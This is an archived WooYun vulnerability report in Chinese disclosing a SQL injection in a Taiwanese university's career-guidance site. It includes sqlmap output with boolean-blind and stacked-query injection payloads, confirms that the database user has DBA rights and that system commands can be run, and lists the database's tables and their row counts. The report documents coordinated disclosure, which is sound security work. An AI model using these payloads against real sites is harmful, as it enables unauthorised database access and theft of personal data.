乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
世新大學職涯導航站注入点(menu_id):http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598
sqlmap resumed the following injection point(s) from stored session:---Parameter: menu_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: menu_id=5 AND 3436=3436&submenu_id=413&apmenu_id=1598 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: menu_id=5;WAITFOR DELAY '0:0:5'--&submenu_id=413&apmenu_id=1598---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current database: 'CareerGuide_Shu'current user is DBA: Trueavailable databases [5]:[*] CareerGuide_Shu[*] master[*] model[*] msdb[*] tempdb
dba权限,可以执行系统命令:
Database: CareerGuide_Shu+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.FunctionRecords | 308682 || dbo.VisitorRecords | 14623 || dbo.Class_sign | 8204 || dbo.Code | 4039 || dbo.Code_201201 | 3999 || dbo.LearnMap | 1789 || dbo.papers | 1682 || dbo.Account | 1585 || dbo.appear_papers | 1493 || dbo.Job_Jobtype_TOT | 1337 || dbo.Job_Main_TOT | 1019 || dbo.Res_Comp_TOT | 992 || dbo.Res_Epaper | 944 || dbo.Job_Desc_TOT | 925 || dbo.Consultant_Calendar | 879 || dbo.Cmp_Main | 817 || dbo.JobNeeded | 800 || dbo.Res_Main_TOT | 768 || dbo.Res_Status_TOT | 764 || dbo.Job_Lan_TOT | 588 || dbo.rule_acl | 546 || dbo.Job_Major_TOT | 493 || dbo.Res_Jobtype_TOT | 474 || dbo.Res_Indtype_TOT | 454 || dbo.Consultant_Booking | 360 || dbo.Res_Area_TOT | 342 || dbo.Cmp_Profile | 240 || dbo.DataCheck | 240 || dbo.Class | 207 || dbo.MyBook | 206 || dbo.Res_Exp_TOT | 156 || dbo.Res_Lan_TOT | 147 || dbo.Res_Profile_TOT | 142 || dbo.admin_tools | 129 || dbo.Res_Workexp_TOT | 116 || dbo.Res_cerT_TOT | 92 || dbo.Cmp_Image | 89 || dbo.Cmp_Sort | 89 || dbo.Res_edU_TOT | 80 || dbo.extra_function | 78 || dbo.Cmp_News | 74 || dbo.ForumMain | 58 || dbo.Res_Course_TOT | 53 || dbo.system_profile_ext | 52 || dbo.Share | 49 || dbo.Epaper_MailList | 43 || dbo.label | 43 || dbo.EpaperList | 42 || dbo.Cmp_Gmessage | 29 || dbo.Res_Reward_TOT | 29 || dbo.Res_Association_TOT | 27 || dbo.Res_Parttime_TOT | 27 || dbo.Consultant_Teacher | 22 || dbo.Res_Service_TOT | 19 || dbo.mail_open | 18 || dbo.Res_Jobplan_TOT | 18 || dbo.Res_ExtrActive_TOT | 15 || dbo.function_class | 10 || dbo.Res_Hidden_TOT | 9 || dbo.label_class | 7 || dbo.rule_user | 7 || dbo.rule_group | 6 || dbo.user_basic | 6 || dbo.HotMessage | 5 || dbo.epaper_type | 3 || dbo.Res_Check_TOT | 2 || dbo.FAQ | 1 || dbo.system_profile | 1 |+-------------------------+---------+
表数量和数据量都很大
危害等级:高
漏洞Rank:17
确认时间:2015-12-14 23:35
感謝通報
暂无